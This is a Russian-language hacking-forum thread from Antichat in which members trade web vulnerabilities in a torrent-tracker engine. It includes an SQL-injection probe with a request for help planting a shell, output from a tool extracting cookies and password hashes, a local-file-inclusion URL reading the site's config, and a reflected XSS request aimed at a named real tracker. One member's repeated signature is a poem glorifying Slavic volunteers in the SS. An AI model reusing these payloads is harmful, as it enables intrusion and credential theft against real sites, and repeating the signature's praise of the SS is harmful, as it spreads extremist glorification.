HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 09.02.2010, 15:19
Yuna
Познающий
Регистрация: 22.06.2009
Сообщений: 41
С нами: 8887515

Репутация: 18
По умолчанию

SVN fixed
 
Ответить с цитированием

  #2  
Старый 15.02.2010, 20:20
kirill1927
Новичок
Регистрация: 12.03.2009
Сообщений: 12
С нами: 9034597

Репутация: 2
По умолчанию

роли не какой не играет так как привязка IP к кукам но всё же
Имеем xss в Новостях При создание в поле "Тема"
 
Ответить с цитированием

  #3  
Старый 20.02.2010, 09:45
ILancer
Новичок
Регистрация: 17.01.2010
Сообщений: 3
С нами: 8587116

Репутация: 0
По умолчанию

Люди хелп, если зайти на трекер провайдера по адресу
Код:
http://.ru/rss.php?passkey[]=
Получим это:
Цитата:
Warning: mysql_real_escape_string() expects parameter 1 to be string, array given in G:\nginx\html\include\functions.php on line 759
Тут есть уязвимость?
Раскажите плиз кто нибуть по подробнее
 
Ответить с цитированием

  #4  
Старый 20.02.2010, 10:01
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию

Цитата:
Сообщение от ILancer  
Люди хелп, если зайти на трекер провайдера по адресу
Код:
http://.ru/rss.php?passkey[]=
Тут есть уязвимость?
Раскажите плиз кто нибуть по подробнее
Твое passkey[]= даст тебе только раскрытие путей, но не больше , а про rss.php читай, если не проходит SQL значит пофиксенный rss
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 
Ответить с цитированием

  #5  
Старый 20.02.2010, 14:45
SoftLive
Познающий
Регистрация: 20.12.2009
Сообщений: 33
С нами: 8627425

Репутация: 40
По умолчанию

votesview.php?requestid=-99'



А вообще помогите через неё шелл залить/прочитать файл...

votesview.php есть в YSE немного старее чем с СВН, да и в tbsource дефульт есть
 
Ответить с цитированием

  #6  
Старый 21.02.2010, 02:35
xoren
Новичок
Регистрация: 20.02.2010
Сообщений: 3
С нами: 8537867

Репутация: 0
По умолчанию

Trying to get your cookies... [DONE]
Trying to get passhash: 00000000000000000000000000000000 [DONE]
Trying to get salt: 11111111111111111111 [DONE]

Я не понял чо passhash 0000000.... и salt 111111111... где проблема ?

Последний раз редактировалось HAXTA4OK; 21.02.2010 в 08:14..
 
Ответить с цитированием

  #7  
Старый 21.02.2010, 08:14
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию

Цитата:
Сообщение от xoren  
Trying to get your cookies... [DONE]
Trying to get passhash: 00000000000000000000000000000000 [DONE]
Trying to get salt: 11111111111111111111 [DONE]

Я не понял чо passhash 0000000.... и salt 111111111... где проблема ?
не правильный id/ пропатченная версия двига
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 
Ответить с цитированием

  #8  
Старый 21.02.2010, 22:05
xoren
Новичок
Регистрация: 20.02.2010
Сообщений: 3
С нами: 8537867

Репутация: 0
По умолчанию

HAXTA4OK, понятно... :S
 
Ответить с цитированием

  #9  
Старый 21.10.2012, 19:42
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами: 7854806

Репутация: 173


По умолчанию

Восстанавливаем забытую тему =)

Уязвимость скрипта: modal_mailbox.php (чат)

Тип: Локальный Инклуд

Уязвимый параметр: ?action

Exploit:http://examle.com/modal_mailbox.php?action=../include/config

Внимание, возможно потребуется регистрация на сайте.

Автор: OxoTnik
 
Ответить с цитированием

  #10  
Старый 25.04.2014, 14:21
YaBtr
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами: 7343606

Репутация: 652


По умолчанию

Небольшой UP

passive XSS (reflected)

Уязвимый сценарий: redirector.php

Exploit:

Цитата:
Сообщение от None  
GET /redirector.php?url=%253cscript%253ealert%25281%252 9%253c%25 HTTP/1.1
Host: bit-torrent.kiev.ua
....
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Прошивку iPhone 2.0 взломали ещё до её выхода geforse Мировые новости. Обсуждения. 1 14.07.2008 22:41
Web 2.0 выходит на государственный уровень vadim399 Мировые новости. Обсуждения. 2 12.01.2008 18:06
Проложение витых пар в городских домах Рогатый Трупоед "Железо" 11 20.09.2004 09:08



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.